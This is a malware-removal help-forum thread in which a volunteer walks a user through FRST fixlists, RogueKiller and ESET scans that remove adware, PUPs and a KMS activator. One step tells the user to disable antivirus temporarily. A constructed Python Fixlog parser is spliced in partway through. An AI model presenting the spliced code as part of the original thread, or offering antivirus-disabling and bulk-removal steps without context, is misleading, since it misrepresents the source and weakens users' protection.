Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.135
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:36.113
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\MSDATASRC\7.0.3300.0__b03f5f7f11d50a3a\MSDATASRC.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:35.470
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:54:35.328
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\stdole\7.0.3300.0__b03f5f7f11d50a3a\stdole.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:51:19.676
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\Microsoft.StdFormat\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.StdFormat.dll that did not meet the Microsoft signing level requirements.

Date: 2016-02-13 23:51:19.646
Description: Code Integrity determined that a process (\Device\HarddiskVolume2\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe) attempted to load \Device\HarddiskVolume2\WINDOWS\assembly\GAC\ADODB\7.0.3300.0__b03f5f7f11d50a3a\ADODB.dll that did not meet the Microsoft signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i5-4670K CPU @ 3.40GHz
Percentage of memory in use: 21%
Total physical RAM: 16271.13 MB
Available physical RAM: 12742.79 MB
Total Virtual: 32655.13 MB
Available Virtual: 28445.88 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.69 GB) (Free:16.26 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (New Volume) (Fixed) (Total:931.41 GB) (Free:512.14 GB) NTFS
Drive f: (Seagate Expansion Drive) (Fixed) (Total:1863.02 GB) (Free:333.52 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 4E0A8E17)
Partition 1: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: 4B95E549)
Partition 1: (Active) - (Size=111.7 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 908BDE7D)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

Juliet
2016-03-01, 14:50
Please open Notepad *Do Not Use Wordpad!* or use any other text editor than Notepad or the script will fail. (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open Notepad. Save it to the Desktop as fixlist.txt.
NOTE: It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.
It needs to be saved next to the "Farbar Recovery Scan Tool" (if asked to overwrite the existing one, please allow).



start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
2016-03-01 12:49 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
Task: {025E3B95-A6D2-4C85-BD24-71C170E5A887} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
C:\ProgramData\DP45977C.lfl
C:\Users\Kym\AppData\Local\Temp\sqlite3.dll
Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - \{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} -> No File <==== ATTENTION
EmptyTemp:
Hosts:
End


Open FRST/FRST64 and press the > Fix < button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

~~~~~~~~~~~~~~~

Instructions on how to backup your Favourites/Bookmarks and other data can be found below.

Backup Internet Explorer Favourites (http://www.wikihow.com/Back-Up-Favorites-in-Internet-Explorer)
Backup Firefox Bookmarks (https://support.mozilla.org/en-US/kb/export-firefox-bookmarks-to-backup-or-transfer)
Backup Chrome Bookmarks (http://www.wikihow.com/Export-Bookmarks-from-Chrome)

Proceed with the reset once done.

Internet Explorer: How to reset Internet Explorer settings (http://support.microsoft.com/kb/923737)
Firefox: Reset Firefox (https://support.mozilla.org/en-US/kb/reset-firefox-easily-fix-most-problems)
Chrome: Chrome - Reset browser settings (https://support.google.com/chrome/answer/3296214?hl=en)

~~~~~~~~~~~~~~~~~~~

Please remove any usb or external drives from the computer before you run this scan!


Please download RogueKiller and save it to your desktop.

You can check here (http://support.microsoft.com/kb/827218) if you're not sure if your computer is 32-bit or 64-bit

Download RogueKiller (http://www.sur-la-toile.com/RogueKiller/RogueKiller.exe) to your desktop.


Quit all running programs.
For Windows XP, double-click to start.
For Vista, Windows 7/8, right-click on the program and select Run as Administrator to start, and when prompted allow it to run.
Read and accept the EULA (End User License Agreement)
Click Scan to scan the system.
When the scan completes Close the program > Don't Fix anything!
Don't run any other options, they're not all bad!!
Post back the report which should be located on your desktop.


~~~~~~~~~`

What we can do now is run an online scan with Eset, for the time being it is our most trusted scanner.
Most reliable and thorough.
The settings I suggest will show us items located in quarantine folders so don't be alarmed with this, also, in case of a false positive I ask that you not allow it to delete what it does find.
This scanner can take quite a bit of time to run, depending of course how full your computer is.



Note: This scan may take a long time to complete. Please do not browse the Internet whilst your Anti-Virus is disabled.

ESET Online Scan

Please download ESET Online Scan (http://download.eset.com/special/eos/esetsmartinstaller_enu.exe) and save the file to your Desktop.
Temporarily disable your anti-virus software. For instructions, please refer to the following link (http://www.bleepingcomputer.com/forums/t/114351/how-to-temporarily-disable-your-anti-virus-firewall-and-anti-malware-programs/).
Double-click esetsmartinstaller_enu.exe to run the programme.
Agree to the EULA by placing a checkmark next to Yes, I accept the Terms of Use. Then click Start.
Agree to the Terms of Use once more and click Start. Allow components to download.
Place a checkmark next to Enable detection of potentially unwanted applications.
Click Advanced settings. Place a checkmark next to:

Scan archives
Scan for potentially unsafe applications
Enable Anti-Stealth technology


Ensure Remove found threats is unchecked.
Click Start.
Wait for the scan to finish. Please be patient as this can take some time.
Upon completion, click http://billy-oneal.com/Canned%20Speeches/speechimages/eset/esetListThreats.png. If no threats were found, skip the next two bullet points.
Click http://billy-oneal.com/Canned%20Speeches/speechimages/eset/esetExport.png and save the file to your Desktop, naming it something such as "MyEsetScan".
Push the Back button.
Place a checkmark next to http://3-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/xKN1w2nv.png.pagespeed.ic.JWqIaEgZi7.png and click http://1-ps.googleusercontent.com/x/forums.whatthetech.com/i.imgur.com/SzOC1p0.png.pagespeed.ce.OWDP45O6oG.png.
Re-enable your anti-virus software.
Copy the contents of the log and paste in your next reply.


Please post:
Fixlog.txt
RogueKiller.txt
ESET Online Scan.txt

kym.preston
2016-03-02, 09:21
In this last part you said, "Place a checkmark next to ? and click ?" the two images aren't loading or no longer exist. Would you be able to let me know another way?

Juliet
2016-03-02, 11:26
Place a checkmark next to Uninstall the application on close, and click Finish.

kym.preston
2016-03-02, 12:19
Fix result of Farbar Recovery Scan Tool (x64) Version:27-02-2016
Ran by Kym (2016-03-02 17:35:11) Run:3
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [] => [X]
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => No File
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => No File
CHR Plugin: (Intel® Identity Protection Technology) - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => No File
CHR Plugin: (Java(TM) Platform SE 7 U55) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => No File
U3 idsvc; no ImagePath
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
U3 wpcsvc; no ImagePath
2016-03-01 12:49 - 2014-09-10 20:01 - 00003804 _____ C:\WINDOWS\System32\Tasks\AutoKMS
Task: {025E3B95-A6D2-4C85-BD24-71C170E5A887} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS\AutoKMS.exe [2014-09-10] ()
C:\ProgramData\DP45977C.lfl
C:\Users\Kym\AppData\Local\Temp\sqlite3.dll
Task: {F27906F8-C2D3-459A-A01E-D551D7DB510D} - \{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} -> No File <==== ATTENTION
EmptyTemp:
Hosts:
End
*****************

Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value not found.
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => value restored successfully
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => value restored successfully
C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\ppGoogleNaClPluginChrome.dll => not found.
C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.116\pdf.dll => not found.
C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll => not found.
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll => not found.
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll => not found.
C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll => not found.
idsvc => service not found.
wfpcapture => service not found.
wpcsvc => service not found.
"C:\WINDOWS\System32\Tasks\AutoKMS" => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{025E3B95-A6D2-4C85-BD24-71C170E5A887} => key not found.
C:\WINDOWS\System32\Tasks\AutoKMS => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AutoKMS => key not found.
"C:\ProgramData\DP45977C.lfl" => not found.
"C:\Users\Kym\AppData\Local\Temp\sqlite3.dll" => not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F27906F8-C2D3-459A-A01E-D551D7DB510D} => key not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{780C0A47-0B7D-7E7E-0B11-780C0D7E1109} => key not found.
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
EmptyTemp: => 240.5 MB temporary data Removed.


The system needed a reboot.

==== End of Fixlog 17:35:14 ====

RogueKiller V11.0.14.0 [Feb 29 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/software/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 10 (10.0.10240) 64 bits version
Started in : Normal mode
User : Kym [Administrator]
Started from : C:\Users\Kym\Desktop\RogueKiller.exe
Mode : Scan -- Date : 03/02/2016 18:10:45

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 1 ¤¤¤
[PUP] (X64) HKEY_LOCAL_MACHINE\Software\Partner -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0x0]) ¤¤¤

¤¤¤ Web browsers : 0 ¤¤¤

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: WDC WD10EZRX-00A8LB0 SCSI Disk Device +++++
--- User ---
[MBR] c609e88a3e3a1eba81f6bd58da21a012
[BSP] 6de4e5b287547337ca290f55453cdbb2 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 953766 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive1: Samsung SSD 840 EVO 120G SCSI Disk Device +++++
--- User ---
[MBR] 2414a722e2d20553db2407084ca6f557
[BSP] 5514a66c0c60dbc0c336179378e42b92 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 114371 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK

+++++ PhysicalDrive2: Generic- Multi-Card USB Device +++++
Error reading User MBR! ([15] The device is not ready. )
Error reading LL1 MBR! NOT VALID!
Error reading LL2 MBR! ([32] The request is not supported. )

C:\AdwCleaner\Quarantine\C\ProgramData\3c355888\4543324a.dll.vir a variant of Win32/Adware.Adposhel.A application
C:\FRST\Quarantine\C\Users\Kym\AppData\Local\Temp\ICReinstall_setup.exe.xBAD a variant of Win32/InstallCore.AFF.gen potentially unwanted application
C:\Users\Kym\AppData\Roaming\uTorrent\updates\3.4.1_30925.exe a variant of Win32/AdkDLLWrapper.A potentially unwanted application
C:\WINDOWS\AutoKMS\AutoKMS.exe a variant of MSIL/HackKMS.H potentially unsafe application

kym.preston
2016-03-02, 12:27
Hi Juliet,

I just tried to open twitch.tv, which was being massively spammed by ads before, and it's working perfectly now. I'm not sure if everything is fixed? Or if it's only temporary.

I won't download any addons for Chrome yet, I'll wait for your advice.

Thanks.

Juliet
2016-03-02, 20:16
This last fix should fix any left overs, glad to hear things are good.


Please open Notepad *Do Not Use Wordpad!* or use any other text editor than Notepad or the script will fail. (Start -> Run -> type notepad in the Open field -> OK) and copy and paste the text present inside the quote box below:
To do this highlight the contents of the box and right click on it and select copy.
Paste this into the open Notepad. Save it to the Desktop as fixlist.txt.
NOTE: It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.
It needs to be saved next to the "Farbar Recovery Scan Tool" (if asked to overwrite the existing one, please allow).



start
CreateRestorePoint:
CloseProcesses:
C:\Users\Kym\AppData\Roaming\uTorrent\updates\3.4.1_30925.exe
C:\WINDOWS\AutoKMS\AutoKMS.exe
EmptyTemp:
End


Open FRST/FRST64 and press the > Fix < button just once and wait.
If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

kym.preston
2016-03-03, 05:29
Fix result of Farbar Recovery Scan Tool (x64) Version:02-03-2016
Ran by Kym (2016-03-03 14:21:44) Run:4
Running from C:\Users\Kym\Desktop
Loaded Profiles: Kym (Available Profiles: Kym)
Boot Mode: Normal
==============================================

fixlist content:
*****************
start
CreateRestorePoint:
CloseProcesses:
C:\Users\Kym\AppData\Roaming\uTorrent\updates\3.4.1_30925.exe
C:\WINDOWS\AutoKMS\AutoKMS.exe
EmptyTemp:
End
*****************

Restore point was successfully created.
Processes closed successfully.
C:\Users\Kym\AppData\Roaming\uTorrent\updates\3.4.1_30925.exe => moved successfully
C:\WINDOWS\AutoKMS\AutoKMS.exe => moved successfully
EmptyTemp: => 360 MB temporary data Removed.


The system needed a reboot.

==== End of Fixlog 14:21:51 ====
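
Added example (not part of the original thread, and not FRST's own code): a short Python sketch that reads a Fixlog like the two posted above and separates entries the fix actually changed from entries that were already absent. The sample log is constructed from lines in those two posts; the function names and the "changed"/"absent" categories are assumptions of this example.

```python
import re
from collections import Counter

# Constructed sample: assembled from lines in the two Fixlog.txt posts above.
SAMPLE_FIXLOG = r"""
fixlist content:
*****************
start
HKLM-x32\...\Run: [] => [X]
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]
C:\ProgramData\DP45977C.lfl
C:\WINDOWS\AutoKMS\AutoKMS.exe
EmptyTemp:
Hosts:
End
*****************

Restore point was successfully created.
Processes closed successfully.
HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => value not found.
wfpcapture => service not found.
"C:\ProgramData\DP45977C.lfl" => not found.
C:\WINDOWS\AutoKMS\AutoKMS.exe => moved successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.
EmptyTemp: => 240.5 MB temporary data Removed.

The system needed a reboot.

==== End of Fixlog 17:35:14 ====
"""

# Outcome phrases that appear in the thread's Fixlog output (assumed categories).
OUTCOMES = [
    (re.compile(r"(moved|restored) successfully\.?$"), "changed"),
    (re.compile(r"temporary data Removed\.?$"), "changed"),
    (re.compile(r"not found\.?$"), "absent"),
]


def classify(result):
    """Map the text after '=>' to 'changed', 'absent' or 'unknown'."""
    for pattern, status in OUTCOMES:
        if pattern.search(result):
            return status
    return "unknown"


def parse_fixlog(text):
    """Return (target, result, status) for each result line of a Fixlog."""
    entries = []
    star_rows = 0
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if set(line) == {"*"}:
            star_rows += 1
            continue
        # The echoed fixlist sits between two rows of asterisks and also
        # contains '=>' lines, so results only start after the second row.
        if star_rows < 2:
            continue
        if line.startswith("==== End of Fixlog"):
            break
        if " => " not in line:
            continue  # status sentences such as "Processes closed successfully."
        target, result = line.rsplit(" => ", 1)
        entries.append((target.strip('"'), result, classify(result)))
    return entries


def absent_targets(entries):
    """Targets the fix did not touch because they no longer existed."""
    return [target for target, _, status in entries if status == "absent"]


if __name__ == "__main__":
    parsed = parse_fixlog(SAMPLE_FIXLOG)
    print(Counter(status for _, _, status in parsed))
    for target in absent_targets(parsed):
        print("already absent:", target)
```

An "absent" entry means the item was gone before the fix ran, so the fix itself changed nothing for that line.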

Juliet
2016-03-03, 12:20
DelFix

Please download DelFix (http://general-changelog-team.fr/en/downloads/finish/20-outils-de-xplode/9-delfix) or from Here (http://www.bleepingcomputer.com/download/delfix/) and save the file to your Desktop.

Double-click DelFix.exe to run the programme.
Place a checkmark next to the following items:

Remove disinfection tools

Click the Run button.
-- This will remove the specialised tools we used to disinfect your system. Any leftover logs, files, folders or tools remaining on your Desktop which were not removed can be deleted manually (right-click the file + delete).


~~~~~~~~~~~~~~~~~~~~`


Answers to common security questions - Best Practices (http://www.bleepingcomputer.com/forums/t/407147/answers-to-common-security-questions-best-practices/) by quietman7, MVP
How Malware Spreads - How did I get infected? (http://www.bleepingcomputer.com/forums/t/287710/how-malware-spreads-how-did-i-get-infected/) by quietman7, MVP
Simple and easy ways to keep your computer safe and secure on the Internet (http://www.bleepingcomputer.com/tutorials/keep-your-computer-safe-online/) by Lawrence Abrams, MVP
How to Prevent Malware (http://users.telenet.be/bluepatchy/miekiemoes/prevention.html) by miekiemoes, MVP
How to backup and restore your data using Cobian Backup (http://www.bleepingcomputer.com/tutorials/backup-and-restore-data-with-cobian-backup/) by YourHighness
Slow Computer/browser? It May Not Be Malware (http://www.bleepingcomputer.com/forums/t/87058/slow-computerbrowser-check-here-first;-it-may-not-be-malware/) by quietman7, MVP


The following programmes come highly recommended in the security community.

AdBlock (https://adblockplus.org/en/firefox) is a browser add-on that blocks annoying banners, pop-ups and video ads.
CryptoPrevent (https://www.foolishit.com/) places policy restrictions on loading points for ransomware (eg. CryptoPrevent), preventing your files from being encrypted.
Malwarebytes Anti-Exploit (https://www.malwarebytes.org/antiexploit/) (MBAE) is designed to prevent zero-day malware from exploiting vulnerable software.
Malwarebytes Anti-Malware Premium (https://www.malwarebytes.org/) (MBAM) works in real-time alongside your Anti-Virus to prevent malware execution.
NoScript (http://noscript.net/) is a Firefox add-on that blocks the actions of malicious scripts by using whitelisting and other technology.
Sandboxie (http://www.sandboxie.com/) isolates programmes of your choice, preventing files from being written to your HDD unless approved by you.
Secunia PSI (http://secunia.com/vulnerability_scanning/personal/) will scan your computer for vulnerable software that is outdated, and automatically find the latest update for you.
SpywareBlaster (https://www.brightfort.com/spywareblaster.html) is a form of passive protection, designed to block the actions of malicious websites and tracking cookies.
Web of Trust (https://www.mywot.com/) (WOT) is a browser add-on designed to alert you before interacting with a potentially malicious website.




Want to help others? Join the ClassRoom (http://forums.whatthetech.com/What_the_Tech_Classroom_t80368.html) and learn how.

kym.preston
2016-03-03, 12:28
Once again, thank you so much! I really do appreciate the time and effort you put into helping a complete stranger.

Juliet
2016-03-03, 12:37
We're glad to help, safe surfing :)

Juliet
2016-03-10, 23:48
Glad we could help. :)

Since this issue appears resolved ... this Topic is closed.